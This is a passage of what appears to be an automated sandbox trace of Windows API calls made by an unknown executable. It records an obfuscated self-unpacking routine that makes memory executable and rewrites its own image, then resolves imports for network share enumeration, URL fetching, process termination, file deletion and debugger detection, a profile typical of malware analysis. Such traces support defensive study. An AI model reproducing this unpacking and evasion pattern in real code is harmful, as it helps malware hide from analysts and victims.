returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.578] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.579] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.580] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.581] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.582] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.583] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.584] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.585] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.601] GetLastError () returned 0x0 [0075.611] lstrlenA (lpString="") returned 0 [0075.631] lstrcpyW (in: lpString1=0x6acf68, lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0075.631] LocalAlloc (uFlags=0x0, uBytes=0x90c98) returned 0x210020 [0075.633] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0075.687] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.688] lstrcatA (in: lpString1="", lpString2="WertualProtect" | out: lpString1="WertualProtect") returned="WertualProtect" [0075.688] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0075.688] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90c98, flNewProtect=0x40, lpflOldProtect=0x18f5e8 | out: lpflOldProtect=0x18f5e8*=0x4) returned 1 [0075.773] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0075.774] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.774] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0075.778] Module32First (hSnapshot=0x58, lpme=0x18f370) returned 1 [0075.780] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x870000 [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0075.870] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0075.870] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0075.871] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0075.871] SetErrorMode (uMode=0x400) returned 0x0 [0075.871] SetErrorMode (uMode=0x0) returned 0x400 [0075.871] GetVersionExA (in: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.871] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x2210000 [0075.894] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f328 | out: lpflOldProtect=0x18f328*=0x2) returned 1 [0075.977] VirtualFree (lpAddress=0x2210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.984] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0075.984] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0075.984] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0075.984] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0075.984] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0075.985] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0075.985] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0077.136] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0077.136] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0077.136] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0077.136] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0089.278] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0089.279] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0089.279] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0089.958] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0089.958] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0089.959] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0089.959] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0089.959] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0089.960] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0089.960] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0089.960] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0089.960] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0089.960] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0089.960] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0089.960] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0089.961] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0089.962] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0089.963] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0089.964] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0089.965] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0089.966] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0089.967] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0089.968] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0089.969] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0089.969] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0089.969] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0089.969] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0089.970] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0089.971] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0089.972] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0089.973] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0089.974] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0089.975] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0089.976] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0089.977] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0089.977] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0089.977] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0089.977] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0089.977] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0089.977] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0089.977] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0089.977] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0089.977] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0089.977] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b 